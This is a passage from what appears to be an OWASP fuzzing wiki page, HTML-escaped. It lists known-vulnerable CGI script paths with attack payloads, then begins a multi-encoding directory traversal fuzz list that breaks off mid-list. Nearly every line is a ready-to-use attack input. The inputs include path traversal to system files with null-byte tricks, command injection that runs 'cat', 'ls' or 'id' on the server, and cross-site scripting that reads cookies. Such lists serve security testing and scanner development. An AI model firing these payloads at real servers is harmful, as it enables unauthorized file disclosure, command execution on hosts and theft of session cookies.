hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
